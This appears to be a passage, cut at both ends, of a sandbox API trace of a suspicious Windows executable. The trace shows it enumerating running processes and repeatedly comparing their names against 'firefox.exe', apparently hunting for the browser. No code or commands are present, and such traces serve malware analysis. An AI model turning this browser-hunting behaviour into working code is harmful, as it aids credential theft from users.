returned="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" [0069.254] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.254] CloseHandle (hObject=0x260) returned 1 [0069.254] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="fo deutsch.exe")) returned 1 [0069.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x260 [0069.254] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" (normalized: "c:\\program files (x86)\\windows media player\\fo deutsch.exe")) returned 0x3a [0069.255] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe") returned="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe" [0069.255] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.255] CloseHandle (hObject=0x260) returned 1 [0069.255] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="complete_paso_altered.exe")) returned 1 [0069.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x260 [0069.255] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" (normalized: "c:\\program files (x86)\\google\\complete_paso_altered.exe")) returned 0x37 [0069.255] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" | out: _Dest="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe") returned="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe" [0069.255] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.255] CloseHandle (hObject=0x260) returned 1 [0069.256] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="array_matched_latitude.exe")) returned 1 [0069.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x504) returned 0x260 [0069.256] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\array_matched_latitude.exe" (normalized: "c:\\program files\\common files\\array_matched_latitude.exe")) returned 0x38 [0069.256] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Common Files\\array_matched_latitude.exe" | out: _Dest="C:\\Program Files\\Common Files\\array_matched_latitude.exe") returned="C:\\Program Files\\Common Files\\array_matched_latitude.exe" [0069.256] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.256] CloseHandle (hObject=0x260) returned 1 [0069.256] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="segments-nhs-bee.exe")) returned 1 [0069.257] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x260 [0069.257] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\segments-nhs-bee.exe")) returned 0x47 [0069.257] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe") returned="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe" [0069.257] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.257] CloseHandle (hObject=0x260) returned 1 [0069.257] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="readily knives.exe")) returned 1 [0069.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x260 [0069.258] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\readily knives.exe" (normalized: "c:\\program files\\reference assemblies\\readily knives.exe")) returned 0x38 [0069.258] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Reference Assemblies\\readily knives.exe" | out: _Dest="C:\\Program Files\\Reference Assemblies\\readily knives.exe") returned="C:\\Program Files\\Reference Assemblies\\readily knives.exe" [0069.258] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.258] CloseHandle (hObject=0x260) returned 1 [0069.258] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="barry_slovenia_won.exe")) returned 1 [0069.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc04) returned 0x260 [0069.258] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\barry_slovenia_won.exe")) returned 0x46 [0069.259] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe") returned="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe" [0069.259] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.259] CloseHandle (hObject=0x260) returned 1 [0069.259] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="livearticle.exe")) returned 1 [0069.259] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x260 [0069.259] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" (normalized: "c:\\program files\\windowspowershell\\livearticle.exe")) returned 0x32 [0069.259] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" | out: _Dest="C:\\Program Files\\WindowsPowerShell\\livearticle.exe") returned="C:\\Program Files\\WindowsPowerShell\\livearticle.exe" [0069.259] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.259] CloseHandle (hObject=0x260) returned 1 [0069.260] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="inn_creation.exe")) returned 1 [0069.260] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc44) returned 0x260 [0069.260] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Journal\\inn_creation.exe" (normalized: "c:\\program files\\windows journal\\inn_creation.exe")) returned 0x31 [0069.260] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Windows Journal\\inn_creation.exe" | out: _Dest="C:\\Program Files\\Windows Journal\\inn_creation.exe") returned="C:\\Program Files\\Windows Journal\\inn_creation.exe" [0069.260] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.260] CloseHandle (hObject=0x260) returned 1 [0069.260] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="demand_sony_leeds.exe")) returned 1 [0069.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc5c) returned 0x260 [0069.261] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" (normalized: "c:\\program files\\reference assemblies\\demand_sony_leeds.exe")) returned 0x3b [0069.261] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" | out: _Dest="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe") returned="C:\\Program Files\\Reference Assemblies\\demand_sony_leeds.exe" [0069.261] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.261] CloseHandle (hObject=0x260) returned 1 [0069.261] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="optimize-dressing.exe")) returned 1 [0069.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc70) returned 0x260 [0069.262] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" (normalized: "c:\\program files (x86)\\windows mail\\optimize-dressing.exe")) returned 0x39 [0069.262] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" | out: _Dest="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe") returned="C:\\Program Files (x86)\\Windows Mail\\optimize-dressing.exe" [0069.262] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.262] CloseHandle (hObject=0x260) returned 1 [0069.262] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0069.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf18) returned 0x0 [0069.263] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="order ref ftp.exe")) returned 1 [0069.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfcc) returned 0x260 [0069.263] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe")) returned 0x2f [0069.263] wcscpy (in: _Dest=0x199040, _Source="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" [0069.263] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.263] CloseHandle (hObject=0x260) returned 1 [0069.263] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0069.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad0) returned 0x260 [0069.264] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0069.264] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\taskhostw.exe" | out: _Dest="C:\\Windows\\System32\\taskhostw.exe") returned="C:\\Windows\\System32\\taskhostw.exe" [0069.264] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.264] CloseHandle (hObject=0x260) returned 1 [0069.264] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x260 [0069.265] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0069.265] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0069.265] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.265] CloseHandle (hObject=0x260) returned 1 [0069.265] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0069.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd28) returned 0x0 [0069.265] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0069.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe2c) returned 0x260 [0069.266] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\backgroundTaskHost.exe" (normalized: "c:\\windows\\system32\\backgroundtaskhost.exe")) returned 0x2a [0069.266] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\backgroundTaskHost.exe" | out: _Dest="C:\\Windows\\System32\\backgroundTaskHost.exe") returned="C:\\Windows\\System32\\backgroundTaskHost.exe" [0069.266] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.266] CloseHandle (hObject=0x260) returned 1 [0069.266] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0069.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xda0) returned 0x0 [0069.267] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xfcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vbc.exe")) returned 1 [0069.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc54) returned 0x260 [0069.267] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0069.267] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" | out: _Dest="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe") returned="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" [0069.268] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.268] CloseHandle (hObject=0x260) returned 1 [0069.268] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xfcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vbc.exe")) returned 0 [0069.268] CloseHandle (hObject=0x224) returned 1 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.268] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0069.269] _wcsicmp (_String1="C:\\Windows\\System32\\sihost.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="sihost.exe", _String2="firefox.exe") returned 13 [0069.269] _wcsicmp (_String1="C:\\Windows\\System32\\taskhostw.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="taskhostw.exe", _String2="firefox.exe") returned 14 [0069.269] _wcsicmp (_String1="C:\\Windows\\System32\\RuntimeBroker.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="RuntimeBroker.exe", _String2="firefox.exe") returned 12 [0069.269] _wcsicmp (_String1="C:\\Windows\\explorer.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="explorer.exe", _String2="firefox.exe") returned -1 [0069.269] _wcsicmp (_String1="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="ShellExperienceHost.exe", _String2="firefox.exe") returned 13 [0069.269] _wcsicmp (_String1="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="SearchUI.exe", _String2="firefox.exe") returned 13 [0069.269] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="hadgdp.exe", _String2="firefox.exe") returned 2 [0069.269] _wcsicmp (_String1="C:\\Program Files (x86)\\Common Files\\mergerbass.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="mergerbass.exe", _String2="firefox.exe") returned 7 [0069.269] _wcsicmp (_String1="C:\\Program Files\\Windows Mail\\italianbreakfast.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="italianbreakfast.exe", _String2="firefox.exe") returned 3 [0069.269] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office\\merger raw.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="merger raw.exe", _String2="firefox.exe") returned 7 [0069.269] _wcsicmp (_String1="C:\\Program Files (x86)\\Google\\protein announcements processes.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="protein announcements processes.exe", _String2="firefox.exe") returned 10 [0069.269] _wcsicmp (_String1="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe", _String2="firefox.exe") returned -3 [0069.269] _wcsicmp (_String1="cdt_expenditure_vincent.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="woundchristopher.exe", _String2="firefox.exe") returned 17 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="irrigation_teach.exe", _String2="firefox.exe") returned 3 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="suspect promoting stroke.exe", _String2="firefox.exe") returned 13 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Windows Sidebar\\piepokemon.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="piepokemon.exe", _String2="firefox.exe") returned 10 [0069.270] _wcsicmp (_String1="C:\\Program Files (x86)\\Windows Media Player\\fo deutsch.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="fo deutsch.exe", _String2="firefox.exe") returned 6 [0069.270] _wcsicmp (_String1="C:\\Program Files (x86)\\Google\\complete_paso_altered.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="complete_paso_altered.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Common Files\\array_matched_latitude.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="array_matched_latitude.exe", _String2="firefox.exe") returned -5 [0069.270] _wcsicmp (_String1="C:\\Program Files (x86)\\Windows Multimedia Platform\\segments-nhs-bee.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="segments-nhs-bee.exe", _String2="firefox.exe") returned 13 [0069.270] _wcsicmp (_String1="C:\\Program Files\\Reference Assemblies\\readily knives.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp (_String1="readily knives.exe", _String2="firefox.exe") returned 12 [0069.270] _wcsicmp (_String1="C:\\Program Files (x86)\\Windows Portable Devices\\barry_slovenia_won.exe", _String2="firefox.exe") returned -3 [0069.270] _wcsicmp 